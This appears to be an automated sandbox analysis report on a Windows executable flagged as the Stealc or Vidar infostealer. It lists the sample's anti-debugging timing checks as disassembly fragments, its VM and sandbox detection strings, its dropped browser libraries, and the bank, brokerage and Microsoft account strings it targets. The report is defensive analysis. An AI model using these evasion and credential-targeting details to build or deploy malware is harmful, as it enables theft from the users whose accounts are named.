Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD6443 second address: AD644B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD6724 second address: AD6729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD6729 second address: AD674B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jp 00007FE9A9298656h 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FE9A929865Dh 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD674B second address: AD6750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD6A5D second address: AD6A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A9298668h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD6A7A second address: AD6A80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD6A80 second address: AD6A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE9A9298656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD7023 second address: AD703F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A87AE1F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD703F second address: AD7044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD71E4 second address: AD71EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD732C second address: AD7332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD7332 second address: AD736D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FE9A87AE1FCh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE9A87AE1F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADB606 second address: ADB60B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADBBEE second address: ADBBF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FE9A87AE1E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADBBF8 second address: ADBC65 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007FE9A9298668h 0x0000000e push dword ptr [ebp+122D271Fh] 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FE9A9298658h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov dx, ax 0x00000031 mov edx, dword ptr [ebp+122D311Bh] 0x00000037 push 06939334h 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f jc 00007FE9A9298656h 0x00000045 jmp 00007FE9A929865Ch 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADD18E second address: ADD196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADD196 second address: ADD19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADD19A second address: ADD1B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADF1F3 second address: ADF1F9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150274 second address: 5150278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150278 second address: 515027C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515027C second address: 5150282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150282 second address: 51502DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298664h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop edi 0x0000000e mov ebx, ecx 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007FE9A9298661h 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FE9A929865Eh 0x0000001e mov ebp, esp 0x00000020 jmp 00007FE9A9298660h 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51502DD second address: 51502E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51502E1 second address: 51502E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51502E5 second address: 51502EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150332 second address: 51503FC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE9A9298660h 0x00000008 adc cx, 7158h 0x0000000d jmp 00007FE9A929865Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jmp 00007FE9A9298668h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d movzx eax, dx 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007FE9A9298666h 0x00000027 or ch, 00000018h 0x0000002a jmp 00007FE9A929865Bh 0x0000002f popfd 0x00000030 pop eax 0x00000031 popad 0x00000032 push eax 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007FE9A9298664h 0x0000003a add al, 00000078h 0x0000003d jmp 00007FE9A929865Bh 0x00000042 popfd 0x00000043 pushfd 0x00000044 jmp 00007FE9A9298668h 0x00000049 jmp 00007FE9A9298665h 0x0000004e popfd 0x0000004f popad 0x00000050 xchg eax, ebp 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51503FC second address: 515040F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515040F second address: 5150469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298669h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FE9A929865Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FE9A929865Dh 0x0000001a xor esi, 42DC7D36h 0x00000020 jmp 00007FE9A9298661h 0x00000025 popfd 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150469 second address: 5150477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9A87AE1EAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150477 second address: 515047B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150C00 second address: 5150C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE9A87AE1F7h 0x00000009 and al, 0000007Eh 0x0000000c jmp 00007FE9A87AE1F9h 0x00000011 popfd 0x00000012 push eax 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FE9A87AE1F3h 0x0000001f or ax, 948Eh 0x00000024 jmp 00007FE9A87AE1F9h 0x00000029 popfd 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150C76 second address: 5150C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150C7A second address: 5150C98 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 2A33h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE9A87AE1F0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150C98 second address: 5150C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150C9C second address: 5150CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150CA2 second address: 5150CC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A929865Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE9A929865Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5150CC4 second address: 5150CCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9E9ED4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9FCDCB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 841C50 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005F4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_005EDA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_005EE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_005EBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005E16D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005EF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_005F3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_005F38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_005F4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_005EED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005EDE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005E1160 GetSystemInfo,ExitProcess,

0_2_005E1160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2364554326.00000000009C8000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: AAKJEGCF.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: AAKJEGCF.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: AAKJEGCF.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: AAKJEGCF.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: AAKJEGCF.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: AAKJEGCF.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2365609973.0000000001465000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AAKJEGCF.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: AAKJEGCF.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: AAKJEGCF.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: AAKJEGCF.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: AAKJEGCF.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: AAKJEGCF.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: AAKJEGCF.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: AAKJEGCF.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: AAKJEGCF.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: AAKJEGCF.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: AAKJEGCF.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: AAKJEGCF.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: AAKJEGCF.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2365609973.0000000001433000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: AAKJEGCF.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: AAKJEGCF.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: AAKJEGCF.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: AAKJEGCF.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: AAKJEGCF.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: AAKJEGCF.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: AAKJEGCF.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: AAKJEGCF.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2365609973.00000000013EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: AAKJEGCF.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: AAKJEGCF.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2364554326.00000000009C8000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: AAKJEGCF.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: AAKJEGCF.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C6B5FF0

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005E45C0 VirtualProtect ?,00000004,00000100,00000000

0_2_005E45C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_005F9860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F9750 mov eax, dword ptr fs:[00000030h]

0_2_005F9750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_005F7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C68B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_6C68B66C

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 764, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_005F9600

Source: file.exe, file.exe, 00000000.00000002.2364554326.00000000009C8000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: PtProgram Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_005F7B90

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_005F6920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_005F7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_005F7A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2089686437.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2364033932.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2365609973.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 764, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 764, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

